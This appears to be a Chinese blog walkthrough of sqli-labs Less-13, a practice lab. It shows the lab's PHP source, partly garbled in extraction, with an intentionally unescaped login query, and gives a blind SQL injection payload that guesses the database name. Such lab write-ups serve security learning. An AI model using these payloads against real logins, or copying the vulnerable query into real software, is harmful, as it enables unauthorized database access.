sqli-labs ————less -13

Less -13

sqli-labs ————less -13_第1张图片

源代码:




	
	Less-13- Double Injection- String- with twist



Welcome   Dhakkan
Username :    
Password :    

'; echo "
"; echo ''; //echo " You Have successfully logged in " ; echo ''; echo "
"; //echo 'Your Login name:'. $row['username']; //echo "
"; //echo 'Your Password:' .$row['password']; //echo "
"; echo "
"; echo "
"; echo "
"; echo ''; echo "
"; } else { echo ''; //echo "Try again looser"; print_r(mysql_error()); echo "
"; echo "
"; echo "
"; echo ''; echo "
"; } } ?>
源中的SQL语句:
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";

而且从源代码中可以发现这还是一个盲注哦!

sqli-labs ————less -13_第2张图片

sqli-labs ————less -13_第3张图片

确实没有任何提示信息或者报错的信息给出!

这里该如何构造payload呢?

这里需要闭合单引号、括号、注释掉后面的内容,那么下面我就来简单的实现一下:

猜测数据库第一位:
username:admin')  and left(database(),1)>'a'#
password:aaa

sqli-labs ————less -13_第4张图片

sqli-labs ————less -13_第5张图片

后续的就不再过多的介绍了,这里的这个和之前的GET盲注基本上类似,读者可以自我实现验证。

你可能感兴趣的:(【信息安全】,【渗透测试实战1】,———Sqli-labs实战)